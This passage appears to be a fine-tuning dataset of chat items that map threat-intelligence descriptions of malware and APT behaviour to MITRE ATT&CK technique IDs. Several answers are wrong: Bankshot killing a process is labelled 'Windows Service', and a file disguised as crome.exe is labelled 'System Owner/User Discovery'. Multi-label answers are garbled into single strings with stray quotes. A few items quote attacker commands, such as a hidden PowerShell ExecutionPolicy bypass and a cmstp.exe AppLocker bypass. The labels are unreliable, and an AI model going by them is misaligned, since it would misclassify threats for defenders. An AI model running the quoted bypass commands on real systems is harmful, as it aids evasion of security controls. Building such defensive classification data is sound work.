connection at this time" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, malicious files were decoded prior to execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RARSTONE obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer can execute commands on the victim's machine." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor has used tools to gather information about users." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON. Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller" }, { "role": "assistant", "content": "T1003.003 - OS Credential Dumping: NTDS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to schedule remote AT jobs." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Browser credential stealing: Capability to steal credentials (username and password) from the installed browsers, Microsoft Internet Explorer (MSIE), and Google Chrome browser. Figures 7 and 8 show the code sections responsible for stealing the credentials from MSIE and Chrome browser respectively" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silent Librarian has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets." }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Traps 4.0 can be configured to protect the processes that are cited as being abused in this blog from loading malicious code" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One notable TTP observed by APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences." }, { "role": "assistant", "content": "T1552.006 - Unsecured Credentials: Group Policy Preferences" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth collects the timestamp from the infected machine." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot can terminate a specific process by its process id." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman reports window names along with keylogger information to provide application context." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has created a scheduled task named “AdobeFlashSync” to establish persistence." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot has the ability to capture web session cookies." }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti uses a multithreading technique to fast encrypt all the files. This routine takes seconds to just a few minutes depending on the number of files on the machine. Each sample has a unique extension that the malware adds to the encrypted files. While using Cybereason with prevention mode off to allow investigation of the ransomware execution, it is possible to see the encryption activity and the creation of new files" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts" }, { "role": "assistant", "content": "T1021.005 - Remote Services:VNC', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: SecureWorks) In multiple instances, CTU researchers observed artifacts from unsuccessful attempts to create a web shell on web-accessible JBOSS-based service desk software, followed by use of a functional shell to gain access to the environment" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat has registered two registry keys for shim databases." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It will run the newly downloaded PowerShell script by running the following command via cmd /c: wscript.exe \"Office365DCOMCheck.vbs\" \"PowerShell.exe-ExecutionPolicy bypass -WindowStyle hidden -NoProfile \" The payload will then notify the C2 it has successfully downloaded and executed the secondary PowerShell payload" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used the command \"cmstp.exe /s /ns C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt\" to bypass AppLocker and launch a malicious script." }, { "role": "assistant", "content": "T1218.003 - Signed Binary Proxy Execution: CMSTP" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Brave Prince terminates antimalware processes." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indrik Spider used \"wmic.exe\" to add a new user to the system." }, { "role": "assistant", "content": "T1136 - Create Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman has used Base64 to encode PowerShell commands. DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has used a packed installer file." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gazer communicates with its C2 servers over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum's loader can create a new service named NtmsSvc to execute the payload." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX has a module to create, delete, or modify Registry keys." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute commands from its C2 server." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "File starts as mico-audio.exe and installs to C:\\Users\\%USERNAME%\\AppData\\Roaming\\google-chrome\\crome.exe" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Using Frame1_Layout for macro execution and using lesser known API calls for shellcode execution is known to be used by Lazarus. We also were able to find infrastructure overlap between this campaign and past campaigns of Lazarus (Figure 19" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink has the ability to create a pipe to enable inter-process communication." }, { "role": "assistant", "content": "T1559 - Inter-Process Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Note that .hwp is the extension used by Hangul Word Processor from Hangul Office, which is very popular in South Korea" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified. The following example Python code shows how this encryption takes place:" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanHaiShu executes additional VBScript code on the victim's machine." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Different drivers will be loaded based on the system version. The malware uses IsWow64Process to determine which driver version to load. These drivers are stored in the resource section of the binary and are compressed with the Lempel-Ziv algorithm. The driver file is written to system32\\drivers with a 4-character, pseudo-randomly generated name. This file is then decompressed using LZCopy to a new file with a “.sys” extension" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal's dropper creates VBS scripts on the victim’s machine." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can modify the `HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\` registry key so it can bypass the VB object model (VBOM) on a compromised host." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Last March, we reported a WildPressure campaign targeting industrial-related entities in the Middle East. While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has searched public code repositories for exposed credentials." }, { "role": "assistant", "content": "T1593.003 - Code Repositories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IronNetInjector has been disguised as a legitimate service using the name PythonUpdateSrvc." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload is embedded in the macro as Base64 code. It uses the certutil program to decode the Base64 into a PE file which is then executed" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUGARDUMP's scheduled task has been named `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` or `MicrosoftEdgeCrashRepoeterTaskMachineUA`, depending on the Windows OS version." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses DNS as its C2 protocol." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CaddyWiper can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. CaddyWiper can also halt execution if the compromised host is identified as a domain controller." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In both Carbanak and FIN7 attacks, communication with users’ compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group’s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can enable remote desktop on the victim's machine." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT has collected data and files from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XAgentOSX contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory. XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running \"ls -la ~/Library/Application\\ Support/MobileSync/Backup/\"." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Moses Staff has used batch scripts that can disable the Windows firewall on specific remote machines." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Successfully checking the loader will execute the dllhost.exe process and create a hardcode mutex to avoid injecting it into the wrong dllhost.exe, as there can be multiple instances of it depending on the number of programs using the Internet Information Services" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT34 has used the command-line interface for execution." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak has the ability to exfiltrate data over the C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed PLAINTEE executes the following command in a new process to add persistence" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both previous and ongoing campaign assumes that it has root level access on the machine. Below are code snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses ssh keys and known hosts if they are available to infect other machines" }, { "role": "assistant", "content": "T1552.004 - Unsecured Credentials: Private Keys" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BitPaymer has used dynamic API resolution to avoid identifiable strings within the binary, including \"RegEnumKeyW\"." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crutch can exfiltrate files from compromised systems." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When running with root privileges after a Launch Agent is installed, ThiefQuest installs a plist file to the \"/Library/LaunchDaemons/\" folder with the \"RunAtLoad\" key set to \"true\" establishing persistence as a Launch Daemon." }, { "role": "assistant", "content": "T1543.004 - Create or Modify System Process: Launch Daemon" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads a new version of itself once it has installed. It also downloads additional plugins." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Initial QAKBOT .zip file bypasses some antivirus detections due to password protections." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can obtain information about security software on the victim." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products. After a few months, Turla has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. PowerShell Loader . The PowerShell loader has three main steps: persistence, decryption and loading into memory of the embedded executable or library. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload. WMI consumer PowerShell command . Finally, the script stores the encrypted payload in the Windows registry. Hijacked profile.ps1 file . The base64-encoded PowerShell command is very similar to the one used in the WMI consumers. The key and the salt are also different for each script and are not stored in the script, but only in the WMI filter or in the profile.ps1 file. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools. Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare has used a variety of Windows API functions." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory', 'T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROADTools leverages valid cloud credentials to perform enumeration operations using the internal Azure AD Graph API." }, { "role": "assistant", "content": "T1078.004 - Valid Accounts: Cloud Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has used Rundll32 to load a malicious DLL." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The group appears to maintain a stockpile of stolen certificates and deploys their downloaders and the backdoors signed with them. Some of the more recent revoked certificates include ones that belong to Xuchang Hongguang Technology Co" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication that other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key “78563412”. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. Adding to the change in encryption type, a large part of the code such as network communication procedures, and the persistence method have been re-written. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used DNS for C2 including the publicly available \"requestbin.net\" tunneling service." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": 